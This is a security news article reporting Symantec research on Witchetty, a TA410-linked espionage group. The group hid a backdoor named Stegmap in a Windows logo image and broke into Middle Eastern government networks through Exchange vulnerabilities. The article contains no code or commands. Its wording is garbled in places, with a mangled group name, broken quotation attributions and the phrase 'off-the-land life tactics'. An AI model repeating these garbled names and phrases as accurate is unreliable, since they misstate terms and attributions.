An espionage-focused threat actor has been observed using a steganographic trick to conceal a previously undocumented backdoor in a Windows logo during its attacks on governments in the Middle East.
Broadcom’s Symantec Threat Hunter team attributed the updated tool to a hacking group it tracks as Witchalso known as LookingFrog, a subgroup operating under the TA410 umbrella.
Intrusions involving TA410 — which is believed to share connections with a Chinese threat group known as APT10 (aka Cicada, Stone Panda, or TA429) — primarily feature a modular implant called LookBack.
– archyde news –
Symantec’s latest analysis of attacks between February and September 2022, in which the group targeted the governments of two Middle Eastern countries and the stock exchange of an African country, highlights the use of a new backdoor called Stegmap.
The new malware exploits steganography – a technique used to embed a message (in this case, malware) in a non-secret document – to extract malicious code from a bitmap image of an old Microsoft Windows logo hosted on a GitHub repository.
“Disguising the payload in this way allowed the attackers to host it on a free and trusted service,” the researchers said. to say. “Downloads from trusted hosts such as GitHub are much less likely to raise red flags than downloads from an attacker controlled command and control (C&C) server.”
Stegmap, like any other backdoor, has a wide range of features that allow it to perform file manipulation operations, download and run executables, terminate processes and make changes to the Windows Registry.
The attacks that lead to the deployment of Stegmap weaponize the ProxyLogon and ProxyShell vulnerabilities in Exchange Server to drop the China Chopper web shell, which is then used to perform credential theft and lateral movement activities, before launching the LookBack malware.
A timeline of an intrusion into a government agency in the Middle East reveals that Witchetty maintained remote access for six months and implemented a wide range of post-exploitation efforts, including network enumeration and installation of custom malware, until September 1, 2022.
“Witchetty has demonstrated the ability to continually refine and refresh its toolset to compromise targets of interest,” the researchers said.
“Exploitation of vulnerabilities on public servers provides him with a pathway to organizations, while custom tools coupled with skillful use of off-the-land life tactics allow him to maintain a long-term persistent presence in targeted organizations. .”